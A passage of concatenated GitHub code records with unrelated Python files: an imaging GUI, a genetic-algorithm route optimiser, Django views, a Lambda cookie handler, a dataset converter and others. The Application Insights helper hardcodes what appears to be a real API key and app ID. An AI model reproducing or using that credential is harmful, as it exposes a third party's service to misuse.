self.axes.get_ylim()\n #print self.stack.shape\n \n if event.inaxes == self.axes :\n if (self.proi_mode == True) and (self.pcollect_roi == True) :\n # This is CRUCIAL:\n # coordinate system of imshow:\n # 0 \n # |\n # |\n # y|\n # |\n # |\n # v 0-------->\n # x\n # the box points I get from on_pick perfectly follow this convention.\n # When I plot (e.g. using plot) these points on the imshow figure, they appear a the right location\n # Hence the coordinate system of imshow, extracted points and replotting points on it\n # are consistent.\n # However, the matrix arrangement (according to numpy) is the following:\n #\n # 0 \n # |\n # |\n # x|\n # |\n # |\n # v 0-------->\n # y\n # Assume imshow shows matrix M and I have according to imshow the coordinates (x, y). To get\n # the cooresponding element from the matrix, I have to type M(y, x). This is because\n # y corresponds to the rows (which come first) and x to the columns. So,\n # if I want to save the ROI coordinates according to the numpy matrix convention, I\n # should save x as y and y as x:\n # Again, I save the coordinates according to the way I access a matrix element: rows first, then columns\n self.curr_roi_x.append(box_points[1])\n self.curr_roi_y.append(box_points[0])\n\n self.draw_figure()\n\n if self.proi_mode == True and self.proi_delete == True :\n self.proi_delete = False\n # NOTE: change of coordinate system\n (py,px) = (box_points[0], box_points[1])\n point = Point(px,py)\n i = 0\n for r in self.ROIs :\n (x0,y0) = (r[0][0], r[1][0])\n polyg = Polygon(zip(r[0], r[1]) + [(x0,y0)])\n if polyg.contains(point) :\n # delete this point\n self.ROIs.pop(i)\n self.draw_figure()\n i = i+1\n \n\n def on_roi_check(self, event):\n print(\"checked roi\")\n if self.roi_check.IsChecked() :\n self.proi_mode = True\n self.draw_figure()\n else :\n self.proi_mode = False\n self.curr_roi_x = []\n self.curr_roi_y = []\n self.draw_figure()\n\n\n def on_disk_check(self, event):\n if self.disk_check.IsChecked() :\n self.pdisk = True\n self.draw_figure()\n else :\n print(\"disk unchecked\")\n self.pdisk = False\n self.draw_figure()\n\n\n # callback for LOAD button\n def on_button_load(self, event):\n self.load_rois()\n self.draw_figure()\n\n\n def on_button_save(self, event):\n self.save_rois()\n\n\n def on_button_new(self, event):\n ddir = os.path.join(self.ipath, self.name)\n fname_base = 'recording_' + self.name + '_roilistn' \n files = [f for f in os.listdir(ddir) if re.match(fname_base, f)]\n l = []\n for f in files :\n a = re.search('^' + fname_base + \"(\\d+)\", f)\n if a :\n l.append(int(a.group(1)))\n \n n = 1\n if l:\n n = max(l) + 1\n\n print(\"creating new roilist with id %d\" % n)\n self.roi_id = n\n\n \n def on_exit(self, event):\n self.Destroy() \n \n \n def on_open(self, event):\n dlg = wx.DirDialog(\n self, \n message=\"Chose imaging folder...\",\n defaultPath=self.ipath,\n style=wx.FD_SAVE)\n \n if dlg.ShowModal() == wx.ID_OK:\n self.name = os.path.split(dlg.GetPath())[-1]\n self.setup_imaging()\n\n\n def on_extract(self, event):\n msg = \"\"\" Extracting ROIs and Background\n That might take a while...\n \"\"\"\n dlg = wx.MessageDialog(self, msg, \"Extracting ROIs\", wx.OK)\n dlg.ShowModal() \n dlg.Destroy()\n self.extract_rois()\n\n\n def on_plot(self, event):\n \"\"\"\n plot ROIs; dialog asking for correction factor\n \"\"\"\n dlg = wx.TextEntryDialog(self, \"Set correction factor\", value='0.9')\n dlg.ShowModal()\n corr = float(dlg.GetValue())\n dlg.Destroy()\n\n self.plot_rois(corr)\n\n \n ### ROI Management related functions\n def extract_rois(self):\n \"\"\"\n extract ROIs and Halo Background\n \"\"\"\n ddir = os.path.join(self.ipath, self.name)\n #if not self.pcorr_stack:\n # arec = 'recording_' + self.name + '_downsamp.hdf5'\n #else:\n # arec = 'recording_' + self.name + '_downsampcorr.hdf5'\n arec = 'recording_' + self.name + self.file_type\n stack = img.TIFFStack(ddir, arec)\n \n # get the surround of each roi for background subtraction\n Bkg, Halo = img.halo_subt(self.ROI_coords, 10, stack.nx, stack.ny, zonez=5)\n # extract ROIs\n print(\"starting to extract ROIs for roi list %d\" % (self.roi_id))\n ROI = stack.get_rois(self.ROI_coords)\n print(\"got ROIs\")\n print(\"starting to extract background...\")\n bROI = stack.get_rois(Halo)\n print(\"got surround of ROIs\")\n # Finally save Ca traces for later analysis\n img.save_catraces(self.ipath, self.name, self.roi_id, ROI, bROI)\n\n\n # plot calcium traces along with color coded brainstates\n def plot_rois(self, corr):\n \"\"\"\n plot rois by calling function in imaging.py\n \"\"\"\n if os.path.isfile(os.path.join(self.ipath, self.name, 'remidx_%s.txt'%self.name)):\n img.plot_catraces(self.ipath, self.name, self.roi_id, cf=corr, pspec=True)\n else:\n img.plot_catraces_simple(self.ipath, self.name, self.roi_id, cf=corr, SR=10)\n\n\n def save_rois(self):\n #transform gui ROI format to save format\n self.set_roicoords()\n img.save_roilist(self.ipath, self.name, self.ROI_coords, self.ROIs, roi_id=self.roi_id)\n print(\"Saved roi list %d\" % (self.roi_id))\n\n \n def load_rois(self):\n wildcard = \"*.mat\"\n #dialog = wx.FileDialog(None, \"Choose a ROI list\", os.path.join(self.ipath, self.name), \"\", wildcard, wx.OPEN)\n #09/08/17: no idea why wildcard is not working anymore??\n dialog = wx.FileDialog(None, \"Choose a ROI list\", os.path.join(self.ipath, self.name), \"\", wildcard=wildcard, style=wx.FD_OPEN)\n if dialog.ShowModal() == wx.ID_OK:\n self.roi_name = dialog.GetFilename()\n fname_base = 'recording_' + self.name + '_roilistn'\n a = re.search('^' + fname_base + \"(\\d+)\", self.roi_name)\n self.roi_id = int(a.group(1))\n\n (self.ROI_coords, self.ROIs) = img.load_roilist(self.ipath, self.name, self.roi_id)\n #nroi = len(self.ROIs)\n #cmap = plt.get_cmap('jet')\n #cmap = cmap(range(0, 256))[:,0:3]\n #self.cmap = downsample_matrix(cmap, int(np.floor(256/nroi)))\n self.set_cmap()\n print(\"selected roi list %d\" % self.roi_id)\n\n\n def set_cmap(self) :\n nroi = len(self.ROIs)\n cmap = plt.get_cmap('jet')\n cmap = cmap(range(0, 256))[:,0:3]\n self.cmap = ut.downsample_matrix(cmap, int(np.floor(256/nroi)))\n \n \n def set_roicoords(self):\n \"\"\"\n get all the pixels within an roi\n \"\"\"\n Coords = []\n for r in self.ROIs:\n (X, Y) = (r[0], r[1])\n xmin = int(round(min(X)))\n xmax = int(round(max(X)))\n ymin = int(round(min(Y)))\n ymax = int(round(max(Y)))\n\n x, y = np.meshgrid(np.arange(xmin,xmax+1), np.arange(ymin,ymax+1))\n x, y = x.flatten(), y.flatten()\n points = np.vstack((x,y)).T\n points = [Point(i) for i in points]\n\n (x0,y0) = (r[0][0], r[1][0])\n polyg = Polygon(zip(r[0], r[1]) + [(x0,y0)])\n\n tmp = [polyg.contains(i) for i in points]\n idx = [np.nonzero(np.array(tmp)==True)][0]\n xin = x[idx]\n yin = y[idx]\n xin = [i for i in xin]\n yin = [i for i in yin] \n Coords.append((xin,yin))\n\n self.ROI_coords = Coords\n\n \n\n# adding functionality to run as script:\nif __name__ == '__main__':\n # adjust to your system:\n ipath = '/Volumes/BB8/Penn/Data/RawImaging'\n\n ##################################3\n import sys\n\n def param_check(x):\n params = {}\n for i in range(0, len(x)):\n a = x[i]\n if re.match('^-', a):\n if i < len(x)-1 :\n params[a] = x[i+1]\n \n return params\n\n args = sys.argv[1:]\n params = param_check(args)\n\n\n if '-i' in params:\n ipath = params['-i'] \n print(\"Using %s as base folder\" % ipath)\n\n\n app = wx.App(False)\n app.frame = ImageViewer(ipath)\n app.frame.Show()\n app.MainLoop()\n\n\n","repo_name":"tortugar/Lab","sub_path":"MiniscImaging/imaging_gui.py","file_name":"imaging_gui.py","file_ext":"py","file_size_in_byte":25163,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"69907278248","text":"import random, time, math\nimport matplotlib.pyplot as plt\n\n# Define os parâmetros do algoritmo genético\ntamanho_populacao = 10 # quantos indivíduos vão ser gerados em cada geração.\ntaxa_mutacao = 0.01\ngeracoes = 100\n\n# Inicializando meu programa e obtendo a minha matriz\nwith open(\"matriz\", \"r\") as f:\n linhas = f.readlines()[1:]\nmatrix = []\nfor linha in linhas:\n linha = linha.strip().split()\n matrix.append(linha)\n\n# Cria uma lista e um dicionario com os pontos diferentes de zero\npontos = []\ndict_pontos = []\nfor i in range(0, len(matrix)):\n for j in range(0, len(matrix[0])):\n if str(matrix[i][j]) != \"0\" and matrix[i][j] != \"R\":\n pontos.append(matrix[i][j])\n dict_pontos.append({\"x\": i, \"y\": j, \"name\": matrix[i][j]})\n if matrix[i][j] == \"R\":\n posicao_R = {\"x\": i, \"y\": j, \"name\": matrix[i][j]}\n\n# Função para calcular a aptidão da população utilizando a função fitness.\ndef aptidao(populacao):\n lista_apitidoes = [None] * len(populacao)\n for i, individuo in enumerate(populacao):\n lista_apitidoes[i] = fitness(individuo)\n maximo = sum(lista_apitidoes)\n return [maximo - x for x in lista_apitidoes]\n\n\ndef fitness(individuo):\n # Calcula a distância entre a posição R e o primeiro ponto do indivíduo\n distancia_total = abs(posicao_R[\"x\"] - dict_pontos[individuo[0]][\"x\"]) + abs(\n posicao_R[\"y\"] - dict_pontos[individuo[0]][\"y\"]\n )\n # Para cada par de pontos consecutivos no indivíduo, calcula a distância entre eles e adiciona à distância total\n for i, ponto_atual in enumerate(individuo):\n if i != len(individuo) - 1:\n distancia_total += abs(\n dict_pontos[ponto_atual][\"x\"] - dict_pontos[individuo[i + 1]][\"x\"]\n ) + abs(dict_pontos[ponto_atual][\"y\"] - dict_pontos[individuo[i + 1]][\"y\"])\n # Calcula a distância entre a posição R e o último ponto do indivíduo, e adiciona à distância total\n distancia_total += abs(posicao_R[\"x\"] - dict_pontos[individuo[-1]][\"x\"]) + abs(\n posicao_R[\"y\"] - dict_pontos[individuo[-1]][\"y\"]\n )\n # Retorna a distância total calculada\n return distancia_total\n\n\n# Esta função é responsável por selecionar os indivíduos mais aptos de uma população.\n# A seleção é feita por meio de um torneio\ndef selection(populacao):\n lista_apt = aptidao(populacao)\n lista_pais = [None] * len(populacao)\n for i in range(0, len(populacao), 2):\n pai1 = torneio(lista_apt)\n pai2 = torneio(lista_apt)\n lista_pais[i], lista_pais[i + 1] = populacao[pai1], populacao[pai2]\n return lista_pais\n\ndef torneio(lista_apt):\n ind1 = random.randint(0, len(lista_apt) - 1)\n ind2 = ind1\n while ind1 == ind2:\n ind2 = random.randint(0, len(lista_apt) - 1)\n return ind1 if lista_apt[ind1] > lista_apt[ind2] else ind2\n\n# Realiza o cruzamento genético entre dois indivíduos representados como listas retornando o filho.\n\ndef crossover(pai1, pai2):\n ponto_corte1 = random.randint(0, len(pai1) - 1)\n ponto_corte2 = random.randint(0, len(pai1) - 1)\n if ponto_corte1 > ponto_corte2:\n ponto_corte1, ponto_corte2 = ponto_corte2, ponto_corte1\n filho = pai1[ponto_corte1:ponto_corte2]\n for i in pai2:\n if i not in filho:\n filho.append(i)\n return filho\n\n\n# Percorrerá cada posição do indivíduo e, com uma probabilidade de 1%, trocará o valor dessa posição com o valor de outra posição aleatória (j).\ndef mutation(individuo):\n for i in range(len(individuo)):\n if random.random() < taxa_mutacao:\n j = random.randint(0, len(individuo) - 1)\n individuo[i], individuo[j] = individuo[j], individuo[i]\n return individuo\n\n\n# Cria a população inicial com indivíduos aleatórios.\ndef population(tamanho_populacao, pontos):\n populacao = []\n individuos_gerados = []\n # if tamanho_populacao > math.factorial(len(pontos)): tamanho_populacao = math.factorial(len(pontos))\n while len(populacao) < tamanho_populacao:\n individuo = list(range(len(pontos)))\n random.shuffle(individuo)\n if individuo not in individuos_gerados:\n populacao.append(individuo)\n return populacao\n\n\n# Executa o algoritmo genético utilizando as funções de seleção, cruzamento e mutação para criar uma nova população em cada geração. \ndef algoritmo_genetico(geracoes, tamanho_populacao, pontos):\n populacao_inicial = population(tamanho_populacao, pontos)\n for i in range(geracoes):\n populacao = selection(populacao_inicial)\n nova_populacao = []\n while len(nova_populacao) < tamanho_populacao:\n pai1 = random.choice(populacao)\n pai2 = random.choice(populacao)\n filho = crossover(pai1, pai2)\n filho = mutation(filho)\n nova_populacao.append(filho)\n populacao_inicial = nova_populacao\n return populacao\n\n\n# Encontra o melhor indivíduo com menor valor de fitness\nstart = time.time()\npop = algoritmo_genetico(geracoes, tamanho_populacao, pontos)\nlista_apt = aptidao(pop)\nmelhor_individuo = pop[lista_apt.index(max(lista_apt))]\nrota = [pontos[i] for i in melhor_individuo]\ndistancia = fitness(melhor_individuo)\nend = time.time()\nprint(f\"Rota:{rota} \\nDistância: {distancia}\\nTempo de execução: {end-start}\")\n\n\n# # Gráfico da melhor rota\n# rota_coordenada = [dict_pontos[i] for i in melhor_individuo]\n# coordenadas_melhor_rota = (\n# [(posicao_R[\"x\"], posicao_R[\"y\"])]\n# + [(ponto[\"x\"], ponto[\"y\"]) for ponto in rota_coordenada]\n# + [(posicao_R[\"x\"], posicao_R[\"y\"])]\n# ) \n# fig = plt.figure()\n# plt.scatter(\n# [x for x, y in coordenadas_melhor_rota], [y for x, y in coordenadas_melhor_rota]\n# )\n# plt.plot(\n# [x for x, y in coordenadas_melhor_rota], [y for x, y in coordenadas_melhor_rota]\n# )\n# # Adicionar rótulos dos pontos\n# for ponto in rota_coordenada:\n# plt.annotate(ponto[\"name\"], (ponto[\"x\"], ponto[\"y\"]))\n# plt.grid()\n# plt.show()\n\n# #Grafico comparação força bruta Vs AG \n# x = [4,5,7,8,10]\n# y = [0.000971, 0.009004, 0.429994, 20.49354,60]\n# y1 = [ 0.005997,0.006075,0.073047,0.079922,0.275868]\n# plt.plot(x, y, label = 'Algoritmo força bruta') \n# plt.plot(x, y1, label = 'Algoritmo genético')\n# plt.xlabel('Número de pontos de entrega') \n# plt.ylabel('Tempo de execução em segundos') \n# plt.title('Desempenho Força Bruta x Genético') \n# plt.legend()\n# plt.savefig('forca-brutavsgenetico.png', format='png')\n# plt.grid()\n# plt.show() ","repo_name":"carlamarquesz/FlyFood","sub_path":"algoritimo_genetico.py","file_name":"algoritimo_genetico.py","file_ext":"py","file_size_in_byte":6520,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72473553127","text":"import re, sys\n\n\ndef read_words(path_to_file):\n if type(path_to_file) is not str or not path_to_file:\n return []\n\n pattern = re.compile(r'\\w+')\n words = []\n\n try:\n with open(path_to_file) as f:\n for lineno, line in enumerate(f):\n words.extend((lineno//45+1, word) for word in pattern.findall(line.lower()))\n except IOError as e:\n print(f\"I/O error({e.errno}) when opening {path_to_file}: {e.strerror}! I quit!\")\n return []\n \n return words\n\n\ndef read_target_words():\n try:\n with open('../target_words.txt') as f:\n target_words = f.read().split(',')\n except IOError as e:\n print(f\"I/O error({e.errno}) when opening ../stop_words.txt: {e.strerror}! I quit!\")\n return []\n\n target_words.sort()\n return target_words\n\n\ndef find(words, target_word):\n if type(words) is not list or not words:\n return []\n if type(target_word) is not str or not target_word:\n return []\n \n results = []\n for i, (page, word) in enumerate(words):\n if word == target_word:\n result = (page, *(words[i+j][1] for j in range(-2, 3)))\n results.append(result)\n return results\n\n\nfilename = sys.argv[1] if len(sys.argv) > 1 else '../input.txt'\nwords = read_words(filename)\ntarget_words = read_target_words()\nfor target_word in target_words:\n for result in find(words, target_word):\n print(*result[1:], '-', result[0])","repo_name":"nekoTheShadow/exercises-in-programming-style","sub_path":"ch21/q2_2.py","file_name":"q2_2.py","file_ext":"py","file_size_in_byte":1468,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"69852436008","text":"from moviepy import *\nfrom moviepy.editor import *\nimport os\n\npath = r'E:\\YT\\MP3'\nfileformat = \"mp3\"\n\nos.chdir(path)\n\nfor file in os.listdir(path):\n file_format = \".mp3\"\n if file.endswith(\".mp4\"):\n full_path = os.path.join(path, file)\n print(full_path)\n videoclip = VideoFileClip(full_path)\n audioclip = videoclip.audio\n mp3_file = full_path[:-3]\n mp3_file = mp3_file + fileformat\n print(mp3_file)\n audioclip.write_audiofile(mp3_file)\n audioclip.close()\n videoclip.close()\n","repo_name":"MarkBanford/TipsAndTricks","sub_path":"SocialMedia/mp42mp3.py","file_name":"mp42mp3.py","file_ext":"py","file_size_in_byte":549,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31384634817","text":"with open('promote.in','r') as fin:\n lines=fin.readlines()\n\npromotions=[list(map(int,line.split())) for line in lines]\n\nresult=[0,0,0]\n#iterate through each division excluding bronze\nfor i in range(1,4):\n #add number of people before and after for current division and any higher division\n for j in range(i,4):\n result[i-1]+=promotions[j][1]-promotions[j][0]\n\nwith open('promote.out','w') as fout:\n for i in result:\n fout.write(str(i)+'\\n')\n","repo_name":"RithvikKo/usaco","sub_path":"2015-16/bronze/jan/promote.py","file_name":"promote.py","file_ext":"py","file_size_in_byte":467,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"41342323489","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom django.http import HttpResponseRedirect\nfrom .forms import *\nfrom . import models\nfrom django import forms\n\n\n# Create your views here.\n\ndef index(request):\n faction = list(models.Faction.objects.all())\n return render(request, 'fh/index.html', {'faction': faction})\n\n\ndef ajout(request):\n if request.method == \"POST\": # arrive en cas de retour sur cette page après une saisie invalide on récupère donc les données. Normalement nous ne devrions pas passer par ce chemin la pour le traitement des données\n form = FactionForm(request.POST, request.FILES )\n if form.is_valid(): # validation du formulaire.\n faction = form.save() # sauvegarde dans la base\n return HttpResponseRedirect(\"/\")\n else:\n return render(request, \"fh/ajout.html\", {\"form\": form})\n else:\n form = FactionForm() # création d'un formulaire vide\n return render(request, \"fh/ajout.html\", {\"form\": form})\n\n\ndef details(request, id):\n faction = models.Faction.objects.get(pk=id)\n liste = models.Hero.objects.filter(faction_id= id)\n return render(request, \"fh/details.html\", {\"faction\": faction, \"liste\":liste})\n\n\ndef delete(request, id):\n faction = models.Faction.objects.get(pk=id)\n faction.delete()\n return HttpResponseRedirect(\"/\")\n\n\ndef update(request, id):\n faction = models.Faction.objects.get(pk = id)\n form = FactionForm(faction.dico())\n return render(request, \"fh/update.html\",{\"form\":form, \"id\": id})\n\ndef updatetraitement(request, id):\n\n fform = FactionForm(request.POST, request.FILES)\n if fform.is_valid():\n faction = fform.save(commit = False)\n faction.id = id\n faction.save()\n return HttpResponseRedirect(\"/\")\n else:\n return render(request, \"fh/update.html\", {\"form\": fform, \"id\" : id})\n\n\ndef index_hero(request):\n hero = list(models.Hero.objects.all())\n return render(request, 'fh/index_hero.html', {'hero': hero})\n\n\ndef ajout_hero(request,id):\n if request.method == \"POST\": # arrive en cas de retour sur cette page après une saisie invalide on récupère donc les données. Normalement nous ne devrions pas passer par ce chemin la pour le traitement des données\n form = HeroForm(request.POST, request.FILES )\n faction = models.Faction.objects.get(pk=id)\n if form.is_valid(): # validation du formulaire.\n hero = form.save(commit=False)\n hero.faction = faction\n hero.faction_id = id\n hero.save()\n return HttpResponseRedirect(\"/index_hero\")\n else:\n return render(request, \"fh/ajout_hero.html\", {\"form\": form, \"id\":id})\n else:\n form = HeroForm() # création d'un formulaire vide\n return render(request, \"fh/ajout_hero.html\", {\"form\": form, \"id\":id})\n\n\ndef details_hero(request, id):\n hero= models.Hero.objects.get(pk=id)\n return render(request, \"fh/details_hero.html\", {\"hero\": hero})\n\n\ndef delete_hero(request, id):\n hero = models.Hero.objects.get(pk=id)\n hero.delete()\n return HttpResponseRedirect(\"/index_hero\")\n\n\ndef update_hero(request, id):\n hero = models.Hero.objects.get(pk = id)\n form = HeroForm(hero.dico())\n return render(request, \"fh/update_hero.html\",{\"form\":form, \"id\": id})\n\ndef updatetraitement_hero(request, id):\n\n fform = HeroForm(request.POST, request.FILES)\n if fform.is_valid():\n hero= fform.save(commit = False)\n hero.id = id\n hero.save()\n return HttpResponseRedirect(\"/index_hero\")\n else:\n return render(request, \"fh/update_hero.html\", {\"form\": fform, \"id\" : id})","repo_name":"LordLampadaire/projet_fh","sub_path":"projet_fh_django/fh/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3691,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28805425222","text":"import json\n\ndef lambda_handler(event, context):\n #replicates HTTP API stripping double quotes\n input1_headers = {\n 'cookie': 'csrftoken=WvWLrENu05ETxo8ywkCOb9b8xxxxasdasdasd123242423423424; sessionid=35lg1231231dsktufyb8ulkhje0hn4uqc7m7; messages=60fd922b12313131231231231312adsasdcb$[[\\\"__json_message\\\"\\0540\\05430\\054\\\"Items must be selected in order to perform actions on them. No items have been changed.\\\"]]',\n }\n \n #replicates REST API cookie payload\n input2_headers = {\n 'cookie': 'csrftoken=WvWLrENu05ETxo8ywkCOb9b8xxxxasdasdasd123242423423424; sessionid=35lg1231231dsktufyb8ulkhje0hn4uqc7m7; messages=\"60fd922b12313131231231231312adsasdcb$[[\\\"__json_message\\\"\\0540\\05430\\054\\\"Items must be selected in order to perform actions on them. No items have been changed.\\\"]]\"',\n }\n\n #change input1_headers with input2_headers to observe cookie handling\n cookie_components = input1_headers['cookie'].split('; ')\n \n messages_value = None\n \n for component in cookie_components:\n key, value = component.split('=', 1)\n if key == 'messages':\n messages_value = value\n break\n \n #----Check if 'messages' value was found\n if messages_value:\n #if messages_value starts and ends with double quotes, then do nothing\n if messages_value.startswith('\"') and messages_value.endswith('\"'):\n print('message value already starts with doble quotes \"\"')\n else:\n #else, if messages_value does not start and end with double quotes \"\", then add them to start and end\n messages_value = f'\"{messages_value}\"'\n print(messages_value)\n else:\n print(\"No 'messages' found in the input headers.\")\n \n \n return {\n 'statusCode': 200,\n 'body': json.dumps('Hello from Lambda!')\n }\n","repo_name":"Shyam-Prag/Handling-APIGW-HTTP-API-cookies","sub_path":"handle_http_api_stripping_double_quotes.py","file_name":"handle_http_api_stripping_double_quotes.py","file_ext":"py","file_size_in_byte":1849,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39585463032","text":"import logging\n\nimport requests\n\nkey = \"lfxwlb5d15eda5cuy3pa4gl2p47c8re2klylm3r8\"\nappId = \"c2041544-aa9e-4919-8226-e417951e20eb\"\napi_url = f\"https://api.applicationinsights.io/v1/apps/{appId}/query\"\n\n\ndef call_api(query):\n # query = \"traces | take 10\"\n query_params = {\"query\": query}\n headers = {\"x-api-key\": key}\n response = requests.get(api_url, params=query_params, headers=headers)\n try:\n response.raise_for_status()\n except requests.exceptions.HTTPError as err:\n print(\"HTTP error occurred: \", err)\n print(\"The query that caused the error: \", query)\n except Exception as err:\n print(\"Other error occurred: \", err)\n else:\n return response.json()\n","repo_name":"madhublock/kql_ai_generator","sub_path":"appinsights_api.py","file_name":"appinsights_api.py","file_ext":"py","file_size_in_byte":710,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30421959097","text":"#######################################################################################################\r\n## Original Source: https://github.com/dacon-ai/AerialDetection/blob/master/dacon_utils/geojson2coco.py\r\n#######################################################################################################\r\n\r\nimport os\r\nimport json\r\nfrom typing import List\r\nimport math\r\nfrom glob import glob\r\n\r\nfrom tqdm import tqdm\r\nimport cv2\r\nimport numpy as np\r\nfrom PIL import Image\r\n\r\nrootfolder = 'D:/Dacon/Arirang_Dataset/512_256/'\r\n\r\nimage_root = os.path.join(rootfolder, 'images')\r\ntxt_path = os.path.join(rootfolder, 'labels')\r\ndest_file = os.path.join(rootfolder, 'train.json')\r\n\r\ntask = 'train'\r\n# task = 'test'\r\ndifficult = '-1'\r\n\r\nNIA_CLASSES = ['배경', '소형 선박', '대형 선박', '민간 항공기', '군용 항공기', '소형 승용차', '버스', '트럭', '기차', '크레인', '다리',\r\n '정유탱크', '댐', '운동경기장', '헬리패드', '원형 교차로']\r\nCLASS_NAMES_EN = ('background', 'small_ship', 'large_ship', 'civilian_aircraft', 'military_aircraft', 'small_car',\r\n 'bus', 'truck', 'train', 'crane', 'bridge', 'oil_tank', 'dam', 'athletic_field', 'helipad',\r\n 'roundabout')\r\nCLASS_DICT = {'background':0, 'small_ship':1, 'large_ship':2, 'civilian_aircraft':3, 'military_aircraft':4, 'small_car':5,\r\n 'bus':6, 'truck':7, 'train':8, 'crane':9, 'bridge':10, 'oil_tank':11, 'dam':12, 'athletic_field':13,\r\n 'helipad':14, 'roundabout':15}\r\n\r\n# dota to coco\r\nif task == 'train':\r\n data_dict = {}\r\n data_dict['images'] = []\r\n data_dict['categories'] = []\r\n data_dict['annotations'] = []\r\n for idex, name in enumerate(CLASS_NAMES_EN[1:]):\r\n single_cat = {'id': idex + 1, 'name': name, 'supercategory': name}\r\n data_dict['categories'].append(single_cat)\r\n\r\n with open(dest_file, 'w') as f_out:\r\n txts = os.listdir(txt_path)\r\n obj_coords = list()\r\n image_ids = list()\r\n class_indices = list()\r\n class_names = list()\r\n for txt in tqdm(txts, desc='loading txt files'):\r\n with open(os.path.join(txt_path, txt)) as f:\r\n labels = f.readlines()\r\n for label in labels:\r\n label = label.split(' ')\r\n if label[8] != 'etc':\r\n obj_coords.append(label[0:8])\r\n image_ids.append(os.path.join(txt_path, txt).replace('.txt', '.png').split(os.path.sep)[-1])\r\n class_indices.append(CLASS_DICT[label[8]])\r\n class_names.append(label[8])\r\n\r\n img_id_map = {img_file: i + 1 for i, img_file in enumerate(list(set(image_ids)))}\r\n image_ids = [img_id_map[img_file] for img_file in image_ids]\r\n\r\n # convert_labels_to_objects(coords, class_ids, class_names, image_ids, difficult=0, is_clockwise=False):\r\n objs = list()\r\n inst_count = 1\r\n\r\n for coords, cls_id, cls_name, img_id in tqdm(zip(obj_coords, class_indices, class_names, image_ids),\r\n desc=\"converting labels to objects\"):\r\n for i in range(len(coords)):\r\n coords[i] = float(coords[i])\r\n\r\n x_coords = coords[0::2]\r\n y_coords = coords[1::2]\r\n\r\n xmin = min(x_coords)\r\n ymin = min(y_coords)\r\n\r\n xmax = max(x_coords)\r\n ymax = max(y_coords)\r\n\r\n w = xmax - xmin\r\n h = ymax - ymin\r\n\r\n single_obj = {}\r\n single_obj['difficult'] = difficult\r\n single_obj['area'] = w * h\r\n\r\n if cls_name in CLASS_NAMES_EN:\r\n single_obj['category_id'] = CLASS_DICT[cls_name]\r\n else:\r\n continue\r\n\r\n single_obj['segmentation'] = [[int(p) for p in coords]]\r\n single_obj['iscrowd'] = 0\r\n single_obj['bbox'] = (xmin, ymin, w, h)\r\n single_obj['image_id'] = img_id\r\n single_obj['id'] = inst_count\r\n inst_count += 1\r\n objs.append(single_obj)\r\n\r\n data_dict['annotations'].extend(objs)\r\n\r\n for imgfile in tqdm(img_id_map, desc='saving img info'):\r\n imagepath = os.path.join(image_root, imgfile)\r\n img_id = img_id_map[imgfile]\r\n img = cv2.imread(imagepath)\r\n height, width, c = img.shape\r\n single_image = {}\r\n single_image['file_name'] = imgfile\r\n single_image['id'] = img_id\r\n single_image['width'] = width\r\n single_image['height'] = height\r\n data_dict['images'].append(single_image)\r\n\r\n json.dump(data_dict, f_out)\r\n\r\nelif task == 'test':\r\n data_dict = {}\r\n data_dict['images'] = []\r\n data_dict['categories'] = []\r\n for idex, name in enumerate(CLASS_NAMES_EN[1:]):\r\n single_cat = {'id': idex + 1, 'name': name, 'supercategory': name}\r\n data_dict['categories'].append(single_cat)\r\n\r\n with open(dest_file, 'w') as f_out:\r\n image_ids = os.listdir(image_root)\r\n img_id_map = {img_file: i + 1 for i, img_file in enumerate(list(set(image_ids)))}\r\n image_ids = [img_id_map[img_file] for img_file in image_ids]\r\n\r\n for imgfile in tqdm(img_id_map, desc='saving img info'):\r\n imagepath = os.path.join(image_root, imgfile)\r\n img_id = img_id_map[imgfile]\r\n img = cv2.imread(imagepath)\r\n height, width, c = img.shape\r\n single_image = {}\r\n single_image['file_name'] = imgfile\r\n single_image['id'] = img_id\r\n single_image['width'] = width\r\n single_image['height'] = height\r\n data_dict['images'].append(single_image)\r\n\r\n json.dump(data_dict, f_out)\r\n","repo_name":"JunHyungKang/Detection_utils","sub_path":"dota_to_coco.py","file_name":"dota_to_coco.py","file_ext":"py","file_size_in_byte":5854,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"489282732","text":"# -*- coding: utf-8 -*-\n# author: Tac\n# contact: cookiezhx@163.com\n\nAPP_NAME = \"QtQuickPythonTemplate\"\nAPP_VERSION = \"1.0.0\"\nAPP_ICON = \":/resource/icon.jpg\"\nORGANIZATION_NAME = \"Unknown\"\n\nRESOURCE_PREFIX = \"resource\"\nVIEW_PREFIX = \"view\"\nSHADER_PREFIX = \"shader\"\n","repo_name":"Tac213/QtQuickPythonTemplate","sub_path":"src/qt_quick_python_template/const/app_const.py","file_name":"app_const.py","file_ext":"py","file_size_in_byte":264,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"23022140365","text":"import os\nfrom typing import List\n\nimport hydra\nfrom omegaconf import DictConfig\nfrom pytorch_lightning import LightningDataModule, LightningModule, Trainer, seed_everything\nfrom pytorch_lightning.loggers import LightningLoggerBase\nfrom regex import P\nimport torch\nimport pandas as pd\nfrom src import utils\n\nfrom rich.console import Console\nfrom rich.table import Table\n\nlog = utils.get_logger(__name__)\n\n\ndef test(config: DictConfig) -> None:\n \"\"\"Contains minimal example of the testing pipeline. Evaluates given checkpoint on a testset.\n\n Args:\n config (DictConfig): Configuration composed by Hydra.\n\n Returns:\n None\n \"\"\"\n\n # Set seed for random number generators in pytorch, numpy and python.random\n if config.get(\"seed\"):\n seed_everything(config.seed, workers=True)\n\n # Convert relative ckpt path to absolute path if necessary\n if not os.path.isabs(config.ckpt_path):\n 